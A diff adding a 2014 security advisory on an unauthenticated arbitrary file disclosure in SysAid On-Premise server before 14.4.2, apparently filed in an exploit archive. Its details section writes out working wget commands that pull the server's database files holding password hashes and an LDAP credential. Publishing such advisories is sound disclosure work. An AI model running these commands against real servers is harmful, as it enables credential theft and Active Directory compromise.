+++ b/platforms/windows/webapps/35593.txt
@@ -0,0 +1,67 @@
+Vantage Point Security Advisory 2014-004
+========================================
+
+Title: SysAid Server Arbitrary File Disclosure
+ID: VP-2014-004
+Vendor: SysAid
+Affected Product: SysAid On-Premise
+Affected Versions: < 14.4.2
+Product Website: http://www.sysaid.com/product/sysaid
+Author: Bernhard Mueller
+
+
+Summary:
+---
+SysAid Server is vulnerable to an unauthenticated file disclosure
+attack that allows an anonymous attacker to read arbitrary files on
+the system. An attacker exploiting this issue can compromise SysAid
+user accounts and gain access to important system files. When SysAid
+is configured to use LDAP authentication it is possible to gain read
+access to the entire Active Directory or obtain domain admin
+privileges.
+
+Details:
+---
+
+How to download SysAid server database files containing usernames and
+password hashes (use any unauthenticated session ID):
+
+wget -O "ilient.mdf" --header="Cookie:
+JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
+"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"
+
+wget -O "ilient.ldf" --header="Cookie:
+JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
+"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"
+
+
+The dowloaded MSSQL files contain the LDAP user account and encrypted
+password used to access the Active Directory (SysAid encrypts the
+password with a static key that is the same for all instances of the
+software).
+
+
+Fix Information:
+---
+
+Upgrade to version 14.4.2.
+
+
+Timeline:
+---
+
+2014/11/14: Issue reported
+2014/12/22: Patch available and installed by client
+
+About Vantage Point Security:
+---
+
+Vantage Point Security is the leading provider for penetration testing
+and security advisory services in Singapore. Clients in the Financial,
+Banking and Telecommunications industries select Vantage Point
+Security based on technical competency and a proven track record to
+deliver significant and measurable improvements in their security
+posture.
+
+Web: https://www.vantagepoint.sg/
+Contact: office[at]vantagepoint[dot]sg
\ No newline at end of file